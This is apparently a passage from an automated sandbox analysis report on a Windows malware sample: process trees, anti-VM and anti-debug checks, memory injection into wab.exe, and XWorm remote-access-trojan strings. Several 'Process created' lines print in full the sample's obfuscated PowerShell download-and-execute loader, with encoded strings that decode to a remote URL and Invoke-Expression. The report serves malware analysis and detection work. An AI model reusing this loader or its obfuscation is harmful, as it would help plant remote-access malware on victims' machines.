              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7612Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2250Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5099Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4721Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 7612 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep count: 2250 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3040Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3040Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3020Thread sleep count: 5099 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3020Thread sleep count: 4721 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wab.exe, 0000000B.00000002.2672655270.0000000006DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: wscript.exe, 00000001.00000003.1440383799.00000197C29C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?]
              Source: wab.exe, 0000000B.00000002.2672655270.0000000006DFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7772.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTR
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4260000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: CCFFF0Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Blanko.Pro && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr ns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr ns
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr nsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$firtallene = 1;$aspergilla='su';$aspergilla+='bstrin';$aspergilla+='g';function jammerklagen($trykluftsapparaterne){$dialogkort223agttagen=$trykluftsapparaterne.length-$firtallene;for($dialogkort223=5;$dialogkort223 -lt $dialogkort223agttagen;$dialogkort223+=6){$nettofortjeneste+=$trykluftsapparaterne.$aspergilla.invoke( $dialogkort223, $firtallene);}$nettofortjeneste;}function nassedes($bibliografers){. ($herskabshuset) ($bibliografers);}$kirkegange=jammerklagen 'ultram atioind.pz gasai ropelafsenl kon,astrer/omsor5sickl.alan,0p,raf walle(humilwt,ssui reson .ragdikke,osimilwskrigsstift skrivnovervtunor. har 1soupi0beskn.sekar0kalve; mult ,oogawtiercid.kkenpers 6hardw4twal.;do,im tonefx ener6 efri4abeka;caboo merskrundervespr.:finge1preju2keyse1 tena.skaer0clogg)nonfo extr,gpoly,e n.tucmonoskfrounoohmm /shor 2tyr.n0dott 1exten0 oder0lsbla1wha.v0ple e1 spyt at amf empli.rocersvedtechirmfdamp.otribuxblind/i.aer1concr2s,ent1ives.. selv0brnea ';$hydrosalt223=jammerklagen 'agronugarvnswurtzeunecorfawni- n,nna clumgstepuefloc nlandbtpains ';$chalybean=jammerklagen ' skynhconspt fla,teaglepfausssh smo:slutt/under/halv,w nutgwdefinwkat e. kl bszarzuelunksnkunstddrencs embipafgi.aekspocde aiehedvi.bankrcveneroexaggmreint/gutteplinierpreezo .nde/trylld penul ,dan/frig,p nig p overxafideoefterdforfam pens ';$microgramming=jammerklagen ' .ebu> fbr ';$herskabshuset=jammerklagen 'formkifornye ti exbank, ';$nikkelets='cikorieekstrakters';nassedes (jammerklagen 'tilensrumm ecevittsparr-overscbuxtooforbinove ttsubclecamouncanedtovere cardi-un loppseudapr tetforsth plea .ateft card:ty,og\ adredser,iiprobam sin.eachennvasessli uru ,ilamsand,.,upletbackoxfouritalrun hyst- tvejv li.ea flu.lmikr uhypere asso photo$ portntordei,ndavkudda.knonfee,ftallt iazevag,bto.kresskrab; abel ');nassedes (jammerklagen '.rsteiterriftetan waist(tecovt tesseekseksforbltpiker-unharp recaacalort kashhnysen ,lfactkombi:mulci\moruld,onyaijubjum erhve f.lgnkonsts lagnutubipm fru,.alloktvennexmugglt bagf)ander{,ickeemeadwx non.idisiltprec }viren;tppe, ');$unsolidifiable = jammerklagen 'fluttekar ocwarplhcharmokoler pocy%aeoniavogtep varepsubindbumseaexcomtlae,ea ,erl%catar\ agambfagloltyre,aslutsnamninksp.erofluor. unmopmariorchannophleb misbe&julet&sknhe om,rbe,eisecf.rskhre.itobili. a,ce$finko ';nassedes (jammerklagen 'veili$st legdyreblpa,mao extrbbestoa telil laa:whirllraabaosinisr semid skylskoghewundstithickk ookeeb and=,rich(recascenthumfi tsd gglu genet/l,mpicunder under$persoutran,nredefsfjernoulderlschiliu,stedufornid urofasteristarta lathb dupel v,ate pe,f)diala ');nassedes (jammerklagen 'fletn$ terrgbe,zalred,vomyndeb att a in.ul baga: bansmrenovapastaapaxilljockee nderrover.ukontadg rtnsantiet ana.ykri.tr spyt=fl es$ bndscstammhchartasystelorleayforvrbf leselystoacarvynmaxim.omkrysarc iphipmolbu,eaimacultf ded(yderk$extolmtintyiextrackerstrtr nsJump to behavior
              Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 0000000B.00000002.2686700696.0000000022775000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
